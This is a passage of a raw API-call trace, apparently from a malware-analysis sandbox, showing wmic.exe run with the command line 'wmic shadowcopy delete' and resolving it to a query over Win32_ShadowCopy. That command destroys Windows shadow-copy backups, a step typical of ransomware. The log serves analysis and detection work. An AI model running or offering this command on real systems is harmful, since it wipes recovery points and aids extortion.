0x52c670 [0211.251] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.251] free (_Block=0x52c670) [0211.251] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0211.251] malloc (_Size=0x18) returned 0x52c670 [0211.251] malloc (_Size=0x18) returned 0x52c690 [0211.251] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.251] SysStringLen (param_1="TABLE") returned 0x5 [0211.252] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.252] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.252] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.252] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.252] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.252] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.252] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.252] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.252] malloc (_Size=0x30) returned 0x5284c0 [0211.252] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.252] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.252] IUnknown:Release (This=0x219a280) returned 0x0 [0211.252] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=18, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.252] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="mof.xsl") returned 0x0 [0211.252] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.252] malloc (_Size=0x18) returned 0x52c6b0 [0211.252] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.252] free (_Block=0x52c6b0) [0211.252] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0211.252] malloc (_Size=0x18) returned 0x52c6b0 [0211.252] malloc (_Size=0x18) returned 0x52c6d0 [0211.252] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.252] SysStringLen (param_1="TABLE") returned 0x5 [0211.252] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.252] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.252] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.252] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.252] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.252] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0211.252] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.252] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0211.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.253] SysStringLen (param_1="wmiclimofformat") returned 0xf [0211.253] malloc (_Size=0x30) returned 0x528500 [0211.253] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.253] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.253] IUnknown:Release (This=0x219a280) returned 0x0 [0211.253] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=19, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.253] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="textvaluelist.xsl") returned 0x0 [0211.253] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.253] malloc (_Size=0x18) returned 0x52c6f0 [0211.253] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.253] free (_Block=0x52c6f0) [0211.253] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0211.253] malloc (_Size=0x18) returned 0x52c6f0 [0211.253] malloc (_Size=0x18) returned 0x52c710 [0211.253] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.253] SysStringLen (param_1="TABLE") returned 0x5 [0211.253] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.253] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.253] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.253] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.253] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.253] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.253] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.253] malloc (_Size=0x30) returned 0x528540 [0211.253] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.253] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.253] IUnknown:Release (This=0x219a280) returned 0x0 [0211.253] IXMLDOMNodeList:get_item (in: This=0x2199cc0, index=20, listItem=0x16f970 | out: listItem=0x16f970*=0x219bd50) returned 0x0 [0211.254] IXMLDOMNode:get_text (in: This=0x219bd50, text=0x16f980 | out: text=0x16f980*="textvaluelist.xsl") returned 0x0 [0211.254] IXMLDOMNode:get_attributes (in: This=0x219bd50, attributeMap=0x16f978 | out: attributeMap=0x16f978*=0x21978d0) returned 0x0 [0211.254] malloc (_Size=0x18) returned 0x52c730 [0211.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21978d0, name="KEYWORD", namedItem=0x16f988 | out: namedItem=0x16f988*=0x219a280) returned 0x0 [0211.254] free (_Block=0x52c730) [0211.254] IXMLDOMNode:get_nodeValue (in: This=0x219a280, value=0x16f9c0 | out: value=0x16f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0211.254] malloc (_Size=0x18) returned 0x52c730 [0211.254] malloc (_Size=0x18) returned 0x52c750 [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] SysStringLen (param_1="TABLE") returned 0x5 [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0211.254] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0211.254] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0211.254] malloc (_Size=0x30) returned 0x528580 [0211.254] IUnknown:Release (This=0x219bd50) returned 0x0 [0211.254] IUnknown:Release (This=0x21978d0) returned 0x0 [0211.254] IUnknown:Release (This=0x219a280) returned 0x0 [0211.254] IUnknown:Release (This=0x2199cc0) returned 0x0 [0211.254] FreeThreadedDOMDocument:IUnknown:Release (This=0x219bc50) returned 0x1 [0211.254] FreeThreadedDOMDocument:IUnknown:Release (This=0x21971d0) returned 0x0 [0211.254] free (_Block=0x526d90) [0211.254] GetCommandLineW () returned="wmic shadowcopy delete" [0211.273] malloc (_Size=0x30) returned 0x5285c0 [0211.274] memcpy_s (in: _Destination=0x5285c0, _DestinationSize=0x2e, _Source=0x2825cc, _SourceSize=0x2e | out: _Destination=0x5285c0) returned 0x0 [0211.274] malloc (_Size=0x18) returned 0x52c770 [0211.274] malloc (_Size=0x18) returned 0x52c790 [0211.274] malloc (_Size=0x18) returned 0x52c7b0 [0211.274] malloc (_Size=0x18) returned 0x52c7d0 [0211.274] malloc (_Size=0x80) returned 0x526d90 [0211.274] GetLocalTime (in: lpSystemTime=0x16fb30 | out: lpSystemTime=0x16fb30*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x5, wDay=0xc, wHour=0x16, wMinute=0x1e, wSecond=0x17, wMilliseconds=0x1d)) [0211.274] _vsnwprintf (in: _Buffer=0x526d90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16fa88 | out: _Buffer="04-12-2019T22:30:23") returned 19 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] malloc (_Size=0x28) returned 0x526e90 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] malloc (_Size=0x28) returned 0x52ca40 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] malloc (_Size=0x16) returned 0x52c7f0 [0211.274] lstrlenW (lpString="shadowcopy") returned 10 [0211.274] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0211.274] malloc (_Size=0x16) returned 0x52c810 [0211.274] malloc (_Size=0x8) returned 0x526ec0 [0211.274] free (_Block=0x0) [0211.274] free (_Block=0x52c7f0) [0211.274] lstrlenW (lpString=" shadowcopy delete") returned 19 [0211.274] malloc (_Size=0xe) returned 0x52c7f0 [0211.274] lstrlenW (lpString="delete") returned 6 [0211.274] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0211.274] malloc (_Size=0xe) returned 0x52c830 [0211.274] malloc (_Size=0x10) returned 0x52c850 [0211.274] memmove_s (in: _Destination=0x52c850, _DestinationSize=0x8, _Source=0x526ec0, _SourceSize=0x8 | out: _Destination=0x52c850) returned 0x0 [0211.274] free (_Block=0x526ec0) [0211.274] free (_Block=0x0) [0211.274] free (_Block=0x52c7f0) [0211.275] malloc (_Size=0x10) returned 0x52c7f0 [0211.275] lstrlenW (lpString="QUIT") returned 4 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0211.275] lstrlenW (lpString="EXIT") returned 4 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0211.275] free (_Block=0x52c7f0) [0211.275] WbemLocator:IUnknown:AddRef (This=0x1d31390) returned 0x2 [0211.275] malloc (_Size=0x10) returned 0x52c7f0 [0211.275] lstrlenW (lpString="/") returned 1 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0211.275] lstrlenW (lpString="-") returned 1 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0211.275] lstrlenW (lpString="CLASS") returned 5 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0211.275] lstrlenW (lpString="PATH") returned 4 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0211.275] lstrlenW (lpString="CONTEXT") returned 7 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.275] malloc (_Size=0x16) returned 0x52c870 [0211.275] lstrlenW (lpString="shadowcopy") returned 10 [0211.276] GetCurrentThreadId () returned 0x628 [0211.276] ??0CHString@@QEAA@XZ () returned 0x16f940 [0211.276] malloc (_Size=0x18) returned 0x52c890 [0211.276] malloc (_Size=0x18) returned 0x52c8b0 [0211.276] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d31390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4b2998 | out: ppNamespace=0xff4b2998*=0x1d43a98) returned 0x0 [0211.656] free (_Block=0x52c8b0) [0211.656] free (_Block=0x52c890) [0211.656] CoSetProxyBlanket (pProxy=0x1d43a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0211.656] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.656] GetCurrentThreadId () returned 0x628 [0211.656] ??0CHString@@QEAA@XZ () returned 0x16f7d8 [0211.656] malloc (_Size=0x18) returned 0x52c890 [0211.656] malloc (_Size=0x18) returned 0x52c8b0 [0211.656] malloc (_Size=0x18) returned 0x52c8d0 [0211.656] malloc (_Size=0x18) returned 0x52c8f0 [0211.656] SysStringLen (param_1="root\\cli") returned 0x8 [0211.656] SysStringLen (param_1="\\") returned 0x1 [0211.656] malloc (_Size=0x18) returned 0x52c910 [0211.656] SysStringLen (param_1="root\\cli\\") returned 0x9 [0211.656] SysStringLen (param_1="ms_409") returned 0x6 [0211.656] free (_Block=0x52c8f0) [0211.656] free (_Block=0x52c8d0) [0211.657] free (_Block=0x52c8b0) [0211.657] free (_Block=0x52c890) [0211.657] malloc (_Size=0x18) returned 0x52c890 [0211.657] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d31390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4b29a0 | out: ppNamespace=0xff4b29a0*=0x1d43b28) returned 0x0 [0211.665] free (_Block=0x52c890) [0211.665] free (_Block=0x52c910) [0211.665] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.665] GetCurrentThreadId () returned 0x628 [0211.665] ??0CHString@@QEAA@XZ () returned 0x16f950 [0211.665] malloc (_Size=0x18) returned 0x52c910 [0211.665] malloc (_Size=0x18) returned 0x52c890 [0211.665] malloc (_Size=0x18) returned 0x52c8b0 [0211.665] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0211.665] malloc (_Size=0x3a) returned 0x52ca70 [0211.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff441980, cbMultiByte=-1, lpWideCharStr=0x52ca70, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0211.665] free (_Block=0x52ca70) [0211.665] malloc (_Size=0x18) returned 0x52c8d0 [0211.665] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0211.665] SysStringLen (param_1="shadowcopy") returned 0xa [0211.665] malloc (_Size=0x18) returned 0x52c8f0 [0211.665] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0211.665] SysStringLen (param_1="'") returned 0x1 [0211.665] free (_Block=0x52c8d0) [0211.665] free (_Block=0x52c8b0) [0211.665] free (_Block=0x52c890) [0211.665] free (_Block=0x52c910) [0211.665] IWbemServices:GetObject (in: This=0x1d43a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x16f958*=0x0, ppCallResult=0x0 | out: ppObject=0x16f958*=0x1d504e0, ppCallResult=0x0) returned 0x0 [0211.773] malloc (_Size=0x18) returned 0x52c910 [0211.773] IWbemClassObject:Get (in: This=0x1d504e0, wszName="Target", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4b2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0x8, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0211.774] free (_Block=0x52c910) [0211.774] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.774] malloc (_Size=0x3e) returned 0x52ca70 [0211.774] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0211.774] malloc (_Size=0x18) returned 0x52c910 [0211.774] IWbemClassObject:Get (in: This=0x1d504e0, wszName="PWhere", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ae058, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0x8, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0211.774] free (_Block=0x52c910) [0211.774] lstrlenW (lpString=" Where ID = '#'") returned 15 [0211.774] malloc (_Size=0x20) returned 0x52cac0 [0211.774] lstrlenW (lpString=" Where ID = '#'") returned 15 [0211.774] malloc (_Size=0x18) returned 0x52c910 [0211.774] IWbemClassObject:Get (in: This=0x1d504e0, wszName="Connection", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fd768, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0xd, wReserved1=0xff4b, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d509c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0211.774] free (_Block=0x52c910) [0211.774] IUnknown:QueryInterface (in: This=0x1d509c0, riid=0xff447360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f870 | out: ppvObject=0x16f870*=0x1d509c0) returned 0x0 [0211.774] GetCurrentThreadId () returned 0x628 [0211.774] ??0CHString@@QEAA@XZ () returned 0x16f798 [0211.774] malloc (_Size=0x18) returned 0x52c910 [0211.774] IWbemClassObject:Get (in: This=0x1d509c0, wszName="Namespace", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff45738f, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.774] free (_Block=0x52c910) [0211.774] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0211.774] malloc (_Size=0x16) returned 0x52c910 [0211.774] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0211.774] malloc (_Size=0x18) returned 0x52c890 [0211.775] IWbemClassObject:Get (in: This=0x1d509c0, wszName="Locale", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.775] free (_Block=0x52c890) [0211.775] lstrlenW (lpString="ms_409") returned 6 [0211.775] malloc (_Size=0xe) returned 0x52c890 [0211.775] lstrlenW (lpString="ms_409") returned 6 [0211.775] malloc (_Size=0x18) returned 0x52c8b0 [0211.775] IWbemClassObject:Get (in: This=0x1d509c0, wszName="User", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.775] free (_Block=0x52c8b0) [0211.775] malloc (_Size=0x18) returned 0x52c8b0 [0211.775] IWbemClassObject:Get (in: This=0x1d509c0, wszName="Password", lFlags=0, pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.775] free (_Block=0x52c8b0) [0211.775] malloc (_Size=0x18) returned 0x52c8b0 [0211.775] IWbemClassObject:Get (in: This=0x1d509c0, wszName="Server", lFlags=0, pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.775] free (_Block=0x52c8b0) [0211.775] lstrlenW (lpString=".") returned 1 [0211.775] malloc (_Size=0x4) returned 0x526ec0 [0211.775] lstrlenW (lpString=".") returned 1 [0211.775] malloc (_Size=0x18) returned 0x52c8b0 [0211.775] IWbemClassObject:Get (in: This=0x1d509c0, wszName="Authority", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0x52c910), pType=0x0, plFlavor=0x0) returned 0x0 [0211.775] free (_Block=0x52c8b0) [0211.775] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.775] IUnknown:Release (This=0x1d509c0) returned 0x1 [0211.775] GetCurrentThreadId () returned 0x628 [0211.776] ??0CHString@@QEAA@XZ () returned 0x16f798 [0211.776] malloc (_Size=0x18) returned 0x52c8b0 [0211.776] IWbemClassObject:Get (in: This=0x1d504e0, wszName="__RELPATH", lFlags=0, pVal=0x16f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32be58, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0211.776] free (_Block=0x52c8b0) [0211.776] malloc (_Size=0x18) returned 0x52c8b0 [0211.776] GetCurrentThreadId () returned 0x628 [0211.776] ??0CHString@@QEAA@XZ () returned 0x16f618 [0211.776] ??0CHString@@QEAA@PEBG@Z () returned 0x16f630 [0211.776] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f5c0 [0211.776] ?Empty@CHString@@QEAAXXZ () returned 0x7fef83e482c [0211.776] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x52caf0 [0211.776] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0211.776] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f580 [0211.777] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f5c8 [0211.777] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f630 [0211.777] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0211.777] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0211.777] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f588 [0211.777] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5c0 [0211.777] ??1CHString@@QEAA@XZ () returned 0x1 [0211.777] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x52cb60 [0211.777] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0211.777] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f580 [0211.777] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f5c8 [0211.777] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f630 [0211.777] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0211.778] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0211.778] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f588 [0211.778] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f5c0 [0211.778] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.778] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef83e4820 [0211.778] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.778] malloc (_Size=0x18) returned 0x52c8d0 [0211.778] malloc (_Size=0x18) returned 0x52c930 [0211.778] malloc (_Size=0x18) returned 0x52c950 [0211.778] malloc (_Size=0x18) returned 0x52c970 [0211.778] malloc (_Size=0x18) returned 0x52c990 [0211.778] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0211.778] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0211.778] malloc (_Size=0x18) returned 0x52c9b0 [0211.778] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0211.778] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0211.778] malloc (_Size=0x18) returned 0x52c9d0 [0211.778] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0211.778] SysStringLen (param_1="\"") returned 0x1 [0211.778] free (_Block=0x52c9b0) [0211.778] free (_Block=0x52c990) [0211.779] free (_Block=0x52c970) [0211.779] free (_Block=0x52c950) [0211.779] free (_Block=0x52c930) [0211.779] free (_Block=0x52c8d0) [0211.779] IWbemServices:GetObject (in: This=0x1d43b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f608*=0x0, ppCallResult=0x0 | out: ppObject=0x16f608*=0x1d50a50, ppCallResult=0x0) returned 0x0 [0211.781] malloc (_Size=0x18) returned 0x52c8d0 [0211.781] IWbemClassObject:Get (in: This=0x1d50a50, wszName="Text", lFlags=0, pVal=0x16f640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4b2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f640*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3262b0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2addf0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0211.781] free (_Block=0x52c8d0) [0211.781] SafeArrayGetLBound (in: psa=0x3262b0, nDim=0x1, plLbound=0x16f620 | out: plLbound=0x16f620) returned 0x0 [0211.781] SafeArrayGetUBound (in: psa=0x3262b0, nDim=0x1, plUbound=0x16f610 | out: plUbound=0x16f610) returned 0x0 [0211.781] SafeArrayGetElement (in: psa=0x3262b0, rgIndices=0x16f604, pv=0x16f658 | out: pv=0x16f658) returned 0x0 [0211.781] malloc (_Size=0x18) returned 0x52c8d0 [0211.781] malloc (_Size=0x18) returned 0x52c930 [0211.781] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0211.781] free (_Block=0x52c8d0) [0211.781] IUnknown:Release (This=0x1d50a50) returned 0x0 [0211.781] free (_Block=0x52c9d0) [0211.781] ??1CHString@@QEAA@XZ () returned 0x753b5e01 [0211.781] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.781] free (_Block=0x52c8b0) [0211.781] ??1CHString@@QEAA@XZ () returned 0x7fef83e482c [0211.781] lstrlenW (lpString="Shadow copy management.") returned 23 [0211.781] malloc (_Size=0x30) returned 0x528600 [0211.781] lstrlenW (lpString="Shadow copy management.") returned 23 [0211.781] free (_Block=0x52c930) [0211.782] IUnknown:Release (This=0x1d504e0) returned 0x0 [0211.782] free (_Block=0x52c8f0) [0211.782] 